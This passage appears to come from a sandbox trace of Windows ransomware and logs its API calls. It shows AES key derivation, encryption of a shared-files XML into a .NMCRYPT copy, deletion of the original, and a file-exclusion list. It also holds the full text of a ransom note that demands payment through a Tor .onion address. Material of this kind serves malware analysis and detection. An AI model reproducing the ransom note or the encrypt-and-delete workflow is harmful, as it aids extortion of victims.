pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.497] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.498] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.498] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.498] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0158.498] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.498] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad8b8) returned 1 [0158.498] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0158.498] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0158.498] wcslen (_String="\\\\?\\") returned 0x4 [0158.498] CryptDuplicateKey (in: hKey=0x9ad8b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad438) returned 1 [0158.498] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0158.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0158.500] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=1437) returned 1 [0158.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0158.501] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.501] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.501] GetLastError () returned 0x0 [0158.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.502] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.502] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.502] GetLastError () returned 0x0 [0158.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.503] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.503] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.503] GetLastError () returned 0x0 [0158.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.503] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.503] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.503] GetLastError () returned 0x0 [0158.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.503] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.503] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.503] GetLastError () returned 0x0 [0158.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.503] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x9d, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x9d, lpOverlapped=0x0) returned 1 [0158.503] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x9d, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xa0) returned 1 [0158.503] GetLastError () returned 0x0 [0158.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xa0, lpOverlapped=0x0) returned 1 [0158.503] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0158.503] WriteFile (in: hFile=0x588, lpBuffer=0x607e60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0158.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml")) returned 0x20 [0158.503] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", dwFileAttributes=0x20) returned 0 [0158.504] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 1 [0158.504] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml")) returned 0 [0158.504] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" [0158.504] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 1 [0158.504] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.xXDE6B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.xxde6b.tmp")) returned 0xde6b [0158.506] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.xXDE6B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.xxde6b.tmp"), dwFlags=0x1) returned 0 [0158.506] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.xXDE6B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\.xxde6b.tmp")) returned 1 [0158.506] CryptDestroyKey (hKey=0x9ad438) returned 1 [0158.506] wcslen (_String="OK") returned 0x2 [0158.506] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.506] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.506] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0158.506] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0158.506] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0158.506] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0158.506] GetLastError () returned 0x12 [0158.506] FindClose (in: hFindFile=0x9ad3b8 | out: hFindFile=0x9ad3b8) returned 1 [0158.507] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0158.507] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0158.507] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0158.508] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0158.508] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.508] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.508] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0158.508] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.508] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.exe") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.dll") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.lnk") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.bat") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.ini") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.msi") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*.scf") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*pagefile.sys*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*NTUSER.DAT*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*AppData*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\winrar\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\java\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\windows\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\ESET\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\AVG\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\AVIRA\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*Atheros*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*Realtek*") returned 0 [0158.508] PathMatchSpecW 